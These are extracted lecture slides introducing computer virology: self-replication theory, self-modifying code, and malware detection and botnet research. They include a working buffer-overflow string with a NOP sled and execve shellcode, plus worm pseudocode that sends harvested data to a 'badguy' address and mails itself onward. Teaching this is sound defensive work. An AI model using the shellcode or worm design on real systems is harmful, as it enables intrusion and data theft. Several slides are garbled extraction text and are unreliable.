An introduction to Computer Virology
Jean-Yves MarionLORIAINPL - ENSMN
1mercredi 23 février 2011
Some great stories
• Stuxnet • A botnet Waledac
• GhostNet
2mercredi 23 février 2011
What is a malware ?
• A malware is a program which has malicious intentions
• A malware is a virus, a worm, a spyware, a botnet ...
• Giving a mathematical definition is difficult
• However formal definitions are necessary in order to make progress
3mercredi 23 février 2011
How do infections by malware work ?
Social engineering
Vulnerabilities
Infections
Infections
InfectionsInfections
Mutations
4mercredi 23 février 2011
Vulnerabilities : a buffer-overflow
void vulnerable(char *user_data) { char buffer[4]; strcpy(buffer, userdata);}
buffer
EIP
EBP
...
...
...
Stack
vulenrable(«AAAAAAAAAAAAAAAA\xec\xf2\xff\xbf\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/ls»)
\x90\x90
\xE000
\x90\x90
\x90\x90
\xFFF0
5mercredi 23 février 2011
Vulnerabilities : a buffer-overflow
void vulnerable(char *user_data) { char buffer[4]; strcpy(buffer, userdata);}
buffer
EIP
EBP
...
...
...
Stack
\x90\x90
\xE000
\x90\x90
\x90\x90
\xFFF0
return at the address FFF0
6mercredi 23 février 2011
Bugs
• Data are programs
• Bugs are doors if there are exploitable
• A no bug system is safe
0 days exploitBug free n’existe pas
• A buffer-overflow transform a program in a self-modifying program
7mercredi 23 février 2011
Protections: Self-Modification and Obfuscation
• A lot of malware families use home-made obfuscations, like packers to protect their binaries, following a standard model.
• The obfuscation mechanism is automatically modified for each new distributed binary.
!"#$%&'(#)($*+,
- .&( &/ 01.213# /104.4#5 65# "&0#7018#91:;#35 (& 93&(#:( ("#43 <4'134#5= /&..&24'> 15(1'8138 0&8#.?
!"# 6'91:;4'> :&8# 45 16(&01(4:1..@ 0&84/4#8 /&3#1:" '#2 845(34<6(#8 <4'13@A
B
C34>4'1.<4'13@
D'91:;4'>$:&8#
EF
CEF
!349&6)?$G#H#35#7#'>4'##34'>$&/$01.213#$91:;#35$/&3$86004#5$7 I##9J#: BK+K$
• For a human analyst, it is very hard to understand an obfuscated code
8mercredi 23 février 2011
Win32.Swizzor Packer!"#$%&'()*(+'#,-.(/0(1-0#"'2.3#-
445"36#,7*(8&9&":&;&-<3-&&"3-<(#0('2%=2"&(62>?&":(0#"(@,''3&:(; A&&6B&> )C4C(
9mercredi 23 février 2011
Protections: Self-Modification and Obfuscation
• A lot of malware families use home-made obfuscations, like packers to protect their binaries, following a standard model.
• The obfuscation mechanism is automatically modified for each new distributed binary.
!"#$%&'(#)($*+,
- .&( &/ 01.213# /104.4#5 65# "&0#7018#91:;#35 (& 93&(#:( ("#43 <4'134#5= /&..&24'> 15(1'8138 0&8#.?
!"# 6'91:;4'> :&8# 45 16(&01(4:1..@ 0&84/4#8 /&3#1:" '#2 845(34<6(#8 <4'13@A
B
C34>4'1.<4'13@
D'91:;4'>$:&8#
EF
CEF
!349&6)?$G#H#35#7#'>4'##34'>$&/$01.213#$91:;#35$/&3$86004#5$7 I##9J#: BK+K$
• For a human analyst, it is very hard to understand an obfuscated code because not all the code lines are meaningful and because x86 semantics is very tricky.
• One problem is the absence of high level abstraction to structure and understand obfuscated codes.
10mercredi 23 février 2011
What is a malware ?
• Infect systems by self-replication
• Mutation
• Protect itself
• Obfuscation
• Self-modification
• Detection
• Undecidable
Pourquoi tracer ? (1/3)
Definition : l’analyse binaire, c’est
• de l’analyse de programme
• ou le programme est inconnu
=⇒ on a juste un blob binaireRaisons :
• sauts indirects=⇒ flot de controle indecidable
• lectures/ecritures indirectes=⇒ flot de donnees indecidable
• code auto-modifiant=⇒ syntaxe indecidable
3 / 32
11mercredi 23 février 2011
Outline
• Self-replication
• Self-modification
• Detection
• Morphological detection
• Behavioral detection
• Botnet neutralization
12mercredi 23 février 2011
Foundation 1 : Self-Replication
13mercredi 23 février 2011
Self-replicating Cellular automaton
Von Neumann (1952), Burke
Codd, Langton
14mercredi 23 février 2011
Cohen’s formalization (1985)Recursion
theorems as afoundation of
computer virology
Viruses andworms
ILoveYou
State of the art
A more abstractapproach
Abst Virology
Weak recursionBlueprint Distributions
Strong recursionExternal polymorphism
Extendedrecursionfixed polymorphism
Explicit recursionInternal polymorphism
Reproduction throughvectors
Detection
Conclusion
Cohen’s Virus (1985)
� Consider Turing Machine M� and a Viral set V� When a TM M reads v ∈ V , M produces v � ∈ V� (M, V ) is a description of a virus
v1 v2 ... vn v’1 v’2 v’m...
15mercredi 23 février 2011
Self-Replication
• A virus has self-replicating capacity
• Reflexive property of programming language
• Fixed point combinators (functional programming languages)
• Pointer mechanism to program code $0 is shell script
• Program encoding (Ken Thompson «Reflections on trusting Trust», CACM84)
• ComputabilityRecursion theorem of Kleene (1938)
16mercredi 23 février 2011
A worm X scenario:
•Open an email attachment by social engineering
•X scans for informations
•X extracts a list of email address of targeted peoples
•X sends copy of itself by email
A compilation point of view
17mercredi 23 février 2011
WormX(v,out){ info := extract(out); send(«badguy»,info); @bk := findAddress(out); send(@bk,v); }
Worm X specification
How to compile Worm X ?
send informationfind email address
send worm X to @bk
extract information
18mercredi 23 février 2011
Semantics and fixed point equations
Recursion
theorems as a
foundation of
computer virology
Viruses and
worms
ILoveYou
State of the art
A more abstract
approach
Abst Virology
Weak recursion
Blueprint Distributions
Strong recursion
External polymorphism
Extended
recursion
fixed polymorphism
Explicit recursion
Internal polymorphism
Reproduction through
vectors
Detection
Conclusion
Semantics
�_� : Programs×D∗ → D∗
where a value of D∗ is a system environment.
From the above example
�send�([email protected],�� Hello��, Out)
= cons(cons([email protected],�� Hello��), Out)
Where Out is an output stream.
Semantics:
Recursiontheorems as afoundation of
computer virology
I Always Love You
Suppose that out is a system entry point,A specification of ILoveYou is:
love(v,out) {info := find(out); // find informationsout := send(cons(‘‘[email protected]’’,nil),info);@bk := extract(out); //extract addressesout := send(@bk,v); //send virus to @bkreturn out;}
v should behave as ILoveYou if:
!W "(out) = !WormX"(W,out)
We have to solve a fixed point equation :
W is a worm satisfying the specification WormX
19mercredi 23 février 2011
Kleene’s recursion theorem
If p is a program, then there is a program e such that:
Recursiontheorems as afoundation of
computer virology
Kleene’s recursion theorem
A general solution to fixed point equations is given byTheorem (Kleene (1938))If p is a program, then there is a program e such that
!e"(x) = !p"(e, x)
A solution of IloveYou equation
!v"(out) = !love"(v,out)
Set v = e where p = Love.
Recursiontheorems as afoundation of
computer virology
I Always Love You
Suppose that out is a system entry point,A specification of ILoveYou is:
love(v,out) {info := find(out); // find informationsout := send(cons(‘‘[email protected]’’,nil),info);@bk := extract(out); //extract addressesout := send(@bk,v); //send virus to @bkreturn out;}
v should behave as ILoveYou if:
!W "(out) = !WormX"(W,out)
Kleene fixed point is a solution of
Self-replicating malware compiler:
There is Comp such that for all worm spec:
Recursiontheorems as afoundation of
computer virology
Viruses andworms
ILoveYou
State of the art
A more abstractapproach
Abst Virology
Weak recursionBlueprint Distributions
Strong recursionExternal polymorphism
Extendedrecursionfixed polymorphism
Explicit recursionInternal polymorphismReproduction throughvectors
Detection
Conclusion
I Always Love YouSuppose that out is a system entry point,A specification of ILoveYou is:love(v,out) {info := find(out); // find informationsout := send(cons(‘‘[email protected]’’,nil),info);@bk := extract(out); //extract addressesout := send(@bk,v); //send virus to @bkreturn out;}
v should behave as ILoveYou if:
!W "(out) = !WormX"(W,out)
!Comp"(Worm) =W!W"(out) = !Worm"(W,out)
20mercredi 23 février 2011
Self-replicating compilers with mutations
If p is a program, then there is a program e :
where Mutate is a code mutation procedure
Self-replicating compiler with mutations:
There is Comp such that for all worm and mutation procedure:
Recursiontheorems as afoundation of
computer virology
Viruses andworms
ILoveYou
State of the art
A more abstractapproach
Abst Virology
Weak recursionBlueprint Distributions
Strong recursionExternal polymorphism
Extendedrecursionfixed polymorphism
Explicit recursionInternal polymorphismReproduction throughvectors
Detection
Conclusion
Some historical facts
!e"(out) = !Worm"(Mutate(e),out)
! 1983 : the first official virus pn Vax-PDP 11! 1988 : The first worm which infects 6000 machines! 1990 :Dark Avenger mutation engine (Bulgaria)! 1995 : macro virus! 2000 : Worm “I Love You”! 2001 : Palm pilot virus! 2004: Cell phone viruses
Recursiontheorems as afoundation of
computer virology
Viruses andworms
ILoveYou
State of the art
A more abstractapproach
Abst Virology
Weak recursionBlueprint Distributions
Strong recursionExternal polymorphism
Extendedrecursionfixed polymorphism
Explicit recursionInternal polymorphismReproduction throughvectors
Detection
Conclusion
Some historical facts
!e"(out) = !Worm"(Mutate(e),out)
!Comp"(Worm) =W!W"(out) = !Worm"(Mutate(W),out)
! 1983 : the first official virus pn Vax-PDP 11! 1988 : The first worm which infects 6000 machines! 1990 :Dark Avenger mutation engine (Bulgaria)! 1995 : macro virus! 2000 : Worm “I Love You”! 2001 : Palm pilot virus! 2004: Cell phone viruses
21mercredi 23 février 2011
References
• PhD thesis of F. Cohen
• L. Adleman (1988) which coins the word «virus»
• Guillaume Bonfante, Matthieu Kaczmarek, Jean-Yves Marion: On Abstract Computer Virology from a Recursion Theoretic Perspective. Journal in Computer Virology (3-4): 45-54 (2006)
A Virus is a Virus, Lwoff
22mercredi 23 février 2011
Foundation 2 : Auto-modifications
23mercredi 23 février 2011
A simple self-modifications
n + 1n
A simple decryption loop
Wave 2
Wave 1
jnz @b
24mercredi 23 février 2011
Another example of self-modification
Proxy = { X:= Read();
eval(X);}An external input is run
An interpreter of a known or unknown language is used to execute some data
25mercredi 23 février 2011
Applications of self-modifying programs
• Malware mutations
• Code protection (digital rights)
• Compression and packers
• Just in Time compilers
26mercredi 23 février 2011
Analyzing self-modifying programs
• Complex to design and to analyze
• Program flow may change
• Usual in semantics program and data are separatedRecursion
theorems as afoundation of
computer virology
Viruses andworms
ILoveYou
State of the art
A more abstractapproach
Abst Virology
Weak recursionBlueprint Distributions
Strong recursionExternal polymorphism
Extendedrecursionfixed polymorphism
Explicit recursionInternal polymorphismReproduction throughvectors
Detection
Conclusion
Some historical facts
P ! ! " !!
!e"(out) = !Worm"(Mutate(e),out)
!Comp"(Worm) =W!W"(out) = !Worm"(Mutate(W),out)
! 1983 : the first official virus pn Vax-PDP 11! 1988 : The first worm which infects 6000 machines! 1990 :Dark Avenger mutation engine (Bulgaria)! 1995 : macro virus! 2000 : Worm “I Love You”! 2001 : Palm pilot virus! 2004: Cell phone viruses
Define by structural induction on P :
• Axiomatic semantic by means of Hoare logic and separation logic (Myreen and Cai-Appel & al)
27mercredi 23 février 2011
Dynamic analysis of self-modifying programs
• Instrument a program
• Monitor read R, write W memory access and memory execution X
• We follow nested self-modifying
• We detect some code protection
• We detect code patterns
• code decryption
• Integrity checking
• ....
28mercredi 23 février 2011
AC ProtectExemple (3/5)
• hostname packe avec ACProtect
29mercredi 23 février 2011
ThemidaExemple (4/5)
• hostname packe avec Themida
30mercredi 23 février 2011
Experiments with TraceSuferResultats experimentaux 1/3
• Nombre de vagues de code detectees sur l’ensemble des binaires◦ max : 56 vagues
24 / 32
Number of waves detected - max=56
95 613 Binaries, 80% of success, 1400 binaries/h
TraceSurfer based on Pin (Intel)
31mercredi 23 février 2011
Typing systems
• each memory cell m at step x has a level Exec(m,x), Read(m,x), Write(m,x)
• if we execute an instruction at address m:
Exec(m,x+1) = Write(m,x)+1
• if the instruction at address m reads memory address m’
Read(m’,x+1) = Exec(m,x)
• If the instruction at address m writes memory address m’
Write(m’,x+1)= Write(m,x)
32mercredi 23 février 2011
Related works
• TraceSufer based on PIN (INTEL)
• Bitblaze (Berkeley) : TEMU, VINE, ...
• DynamoRio, Ether, Metasm
33mercredi 23 février 2011
Malware detection
34mercredi 23 février 2011
Malware detection by traditional detection
• Signature is a regular expression denoting a sequence of bytes
Worm.YYour mac is now under our control !
• Signature : «Your * is now under our control»
• Signature are quasi-manually constructed
• Vulnerable to code mutations and code obfuscations
• Because based at low (machine code) abstraction level
Because based on low level abstraction at level code machine
35mercredi 23 février 2011
36mercredi 23 février 2011
Morphological analysis in a nutshell
Signatures are abstract flow graph
Detection of subgraph in program flow graph abstraction
37mercredi 23 février 2011
Automatic construction of signatures
38mercredi 23 février 2011
Reduction of signatures by graph rewriting
39mercredi 23 février 2011
Morphological detection : Results
• False negative
• No experiment on unknown malwares
• Signatures with < 18 nodes are potential false negative
• Restricted signatures of 20 nodes are efficient
• Less than 3 sec. for signatures of 500 nodes
40mercredi 23 février 2011
Conclusion about morphological detection
• Benchmarks are good
• Pro
• More robust on local mutation and obfuscation
• Detect easily variants of the same malware family
• Try to take into account program semantics
• Quasi-automatic generation of signatures
• Cons
• Difficult to determine flow graph statically of self-modifying programs
• Use of combination of static and dynamic analysis
41mercredi 23 février 2011
Reference
• Guillaume Bonfante, Matthieu Kaczmarek and Jean-Yves Marion, Architecture of a malware morphological detector, Journal in Computer Virology, Springer 2008.
42mercredi 23 février 2011
Behavioral analysis
• Monitor program interactions (sys calls, network calls, ...)
• Detection of program behavior from execution traces
• Functionalities are express at high level
Trace automata
Introduction
Trace abstraction• Behavior patterns• Abstracting byreduction• Trace automata• Regular abstraction
Malicious behaviordetection
Experiments
Conclusion
12 / 22
• Trace language of a program: generally undecidable.
• Approximation by a regular language: using trace collectionor static analysis.
=! A trace automaton is a finite state approximation of some tracelanguage.
GetLogicalDriveStrings
IcmpSendEcho GetDriveType FindNextFileFindFirstFile
GetDriveType FindFirstFile
FindFirstFile FindNextFile
FindNextFile
• Information leak can be detected
• Static and dynamic analysis
43mercredi 23 février 2011
Some works on behavioral analysis
• Martignoni and al, 2008, on multi-layered abstraction
• Jacob and al, 2009, on low-level functionalities but exponential-time detection
• Beaucamps, Gnaedig, Marion, RV 2010, on fast detection of high level functionalities.
44mercredi 23 février 2011
Botnets
• Understanding malware at the network level, with the interaction between thousands of infected hosts.
• Reverse-engineering
• Provide a start for understanding of a botnet (Protocole, objective...)
• Simulation and analytical modeling
• Large scale experiments in vitro
45mercredi 23 février 2011
Botnet neutralisation in the lab
!"!#$$#%&'(!
!
)!*+,-.*!
!/011!*2#33'(*!!
011!('2'#$'(*!
4!2(5$'%$5(*!
13!
WHITE C&C!
Attack scenario!
46mercredi 23 février 2011
Spam sent by the botnet
47mercredi 23 février 2011
Rlist infections for repeaters
48mercredi 23 février 2011
Conclusions
49mercredi 23 février 2011
Conclusion
• Mathematical definitions of malware with tools
• High level representation of binaries
• Abstract signature which are robust wrt obfuscations
• Experiments theories
• Analyzing tools combining static and dynamic analysis
• Detection and neutralization heuristics
50mercredi 23 février 2011
High Security Lab @ Nancy
lhs.loria.fr
Telescope & honeypotsIn vitro experiment clusters
51mercredi 23 février 2011
Thanks !
52mercredi 23 février 2011